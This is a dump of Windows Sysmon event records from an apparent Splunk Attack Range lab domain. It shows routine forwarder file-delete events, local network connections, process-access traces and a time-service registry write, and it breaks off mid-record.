23542300x800000000000000082753Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:06.960{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9275C7741F43CF971C3F98AA913D79FA,SHA256=06EC9FDC683E3A69B49C1280F545675A382DC6BF4FAC451740AB43FE670396CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104890Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:06.428{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=835935A7861CA8FA26F1121718BBD34A,SHA256=CC87814CE08FF302F729BFD4A0C441F3DA70759A7822D80C9B9B4398302D6546,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104889Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:06.193{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0E009965740818CB16D0F889B77A948,SHA256=AC9BEEFD402B72D6DB2E929766E3BE04F002061CF8F82ABA00AB96B080DFBD23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082755Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:07.969{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCCF15664CBC5DC34735FF0D21FA8A8C,SHA256=9C62D2B02C40F4BB0DCCFBA870F226E7C2A07588B9F0DB50F63CF5D927CB3EC9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104892Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:06.463{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51733-false10.0.1.12-8000- 23542300x8000000000000000104891Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:07.225{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC4EAACDF485DC703D62B56E497C2FC3,SHA256=CB737C58350D408B924EADC18A2BE657FEDA5673BE0886E702C298847A4D6D19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082754Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:07.337{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\respondent-20211004072621-030MD5=CD243B6FFA786E96F03F03FFF6EEA1F9,SHA256=BD72F37F00391F7EDFD796CB74D802386D2E764AAC9DEBCA5D4587784D6F99D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082758Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:08.984{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C76A29619A937DA9D823C72FD069F12A,SHA256=C050C38F2F92DE7082F27DB2A4BDFD6F0C03EE5723E3E03866E57ED7A03126B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104893Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:08.287{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90AA72E99191C8A717382C84401CD7BC,SHA256=5C130283E6263C0AC3C23883225344DFB6C6F43DFEB38DA85619F6DD6E4BF9B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082757Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:08.345{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\surveyor-20211004072618-031MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082756Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:05.794{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50116-false10.0.1.12-8000- 23542300x800000000000000082759Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:09.984{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A20D57FC10672F6BA23C2ED291747307,SHA256=735CE96473E6E077DCFC51BDF0A3C734E0C0DBE928A88C666EADD450C8D2BC21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104894Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:09.287{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C099C912ACB3EE98E0FB18C91457636E,SHA256=F82DA8E6EAD9C93AE938D31F59637477F10D93483F7B7FAB17B07229D9C44392,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082760Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:10.984{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32BDFB8EACAA62E84C7082CBD268027C,SHA256=DA6818B951490FA75EB3E956388524DBAD23A65A77D7712DEE101BB20DACACC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104895Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:10.303{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1DCAC00E5CDCCB3CF6428FE05439D81,SHA256=6586D15EDAA3A6E74D1C3B6A50D4EC7385F00A10A9A554924860AD18873B6282,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082761Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:11.984{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=529C58F50DD0595E843B28E046B75E08,SHA256=2E679E4A97560DBA058A881752CB13E48734287625E7909740EBDCA29D69FE9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104896Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:11.318{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01E426D840A3319808C7ECF0FD2623F0,SHA256=A43B422AA9F2A7D0AF4CA1F3E53C750A8CBBF692E3E3DF34274DEEF08FD75F87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082762Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:12.984{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E57775C17053669E21B83DFB73B001D,SHA256=2515BF27656BE3E83D7D99429AADFCA47C129643F969CA4F19A0AACCA8E889CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104897Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:12.334{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B6B57049AF3E14BB52FF3948B5278B9,SHA256=BD4A40142D3D0C9A81F8CB1421A6B09512739A70F24C1AF57350DA4BEF272781,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082763Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:13.984{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8322C9746EBC0FA81BCCCAF9BD2FC8BA,SHA256=E8353B73D7C55A4D42B353AE776EC5D7AE0700AD41A87FCABD1AA7D656CD3499,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104899Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:12.307{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51734-false10.0.1.12-8000- 23542300x8000000000000000104898Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:13.334{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F74643FF9B57F42F256624A6CA59D25,SHA256=A2F32F6D39C74C62BD495D9ABA5596C7A40622CA34CEB2F9223C171E39423AD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082765Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:14.984{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D748AA043500D82040FAB480EECA473D,SHA256=C6BFE8DE3C39639E1B25004EB97553A334711D9A0187FA7A3E2D15D8444F0C36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104900Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:14.350{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29ECD7FCDDE3FCE82BD29C83403AEAC0,SHA256=7F2E706F7EF5D6FE7B637BD68A3404273BE4E6FC87786C6F679DCE2078D705B4,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082764Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:11.772{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50117-false10.0.1.12-8000- 23542300x8000000000000000104901Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:15.381{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FF8BD55BF34B726ABFD34BEC8592FCB,SHA256=66A86A0DF48D36BDD284A8142CE863E9AA124117375E1E958D0103C916F6E787,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104906Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:16.839{58E9C193-B11C-615A-9C01-00000000FC01}5944ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\new 2@2021-10-04_075343MD5=B24708032E5F6F0C58DDE0D308EB57A6,SHA256=16E1C61BE654ADB4564DE2D62F4C4FB4581B1D817D6C1901598F7D486B5EF5B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104905Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:16.402{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B43142272E484B823182848B574FA6C,SHA256=E82C5F3F10B315A7E3596CF69010DD9B74FB465628C6E2BA0A3D969E0C190B76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082766Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:16.124{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CA0D4FC71E85F9EA80DE0B8B73D2940,SHA256=D10D7365EDC0B6E3D55DF43E908FCE206ADFD69D5CD201F0DFAB50075CA52B94,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104904Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:16.261{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104903Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:16.261{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104902Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:16.261{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104907Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:17.449{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6531C674D0FED6C0B2A296E98A99FC31,SHA256=39B1A125B10F4C180EBF51BBAA50ED3FA5415136E8896C770D45BC5371AE02E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082767Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:17.182{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0B10FD470FDEC06E911B189D196960A,SHA256=39F543762FD2CEABC053E3EC251AE7ACAD1AF6448D5EB4F0E8A9DB87C805E1F0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104909Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:17.344{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51735-false10.0.1.12-8000- 23542300x8000000000000000104908Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:18.449{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65E57BC8AFF9E6DD60C795EAEDE6507F,SHA256=2563EC0F3EC10B592F71559A977B0577CD0F52B2A835C6CCE0AC7B2674B85B54,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000082769Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:58:18.839{2FDD8D40-AC9A-615A-1000-00000000FD01}960C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b8f5-0x980fd7b3) 23542300x800000000000000082768Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:18.182{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E157A3A8502DB800BB54475C62F1638,SHA256=F756776FE996581801D3E233062CAB2C093FFFE62EB6C14DAD0B64C63644885B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104910Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:19.464{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=879DA1545C875A102846F727728E6526,SHA256=37098A51F520C73B2FA362A7C762BA47901DC626D82EC41CBB3342B264F6937C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082771Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:19.229{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=306DEA12592A884DE8A949FACCE84C76,SHA256=24C2E522700E94FD4FB709474BA2CFE1D31A7070116A7EC78912D9AEB50CA042,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082770Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:19.026{2FDD8D40-AC9A-615A-1200-00000000FD01}996NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=8CE5C82D5B9B605782DA9E8D1A5EFA66,SHA256=D94ECFC1B1DCDBB18738F13262E2651E8C77956742A6A75E43441A16B75567E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104911Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:20.495{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FFB5B898C3332EDF054E37E236F0790,SHA256=685E8B952CC9351B85A1DA243A29DCCB57C181EAE6F0439436BDC8FA6FD1D597,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082773Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:17.581{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50118-false10.0.1.12-8000- 23542300x800000000000000082772Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:20.229{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C11B98E93ED8281E13B20B2D94185B67,SHA256=B2B05705BEEBF0CA6BDF487E6A495A78DAAED3A4DB188AE7E5CB4D05F97DDB18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104912Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:21.527{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AC81DD5D166149AFED126DF017C8E9B,SHA256=49232A20DCF097E3CB4B2FA56F6CA8E58136D314911BE0FF83547274CA9106DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082777Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:21.261{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD9B3C06AFD2F76F5D0DF710A9BE2976,SHA256=15705CF544CAE7DCECCAF807E7C0CFF20188302AF4FB72369E506C320E723FDA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082776Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:21.261{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1500-00000000FD01}1148C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082775Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:21.261{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1500-00000000FD01}1148C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082774Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 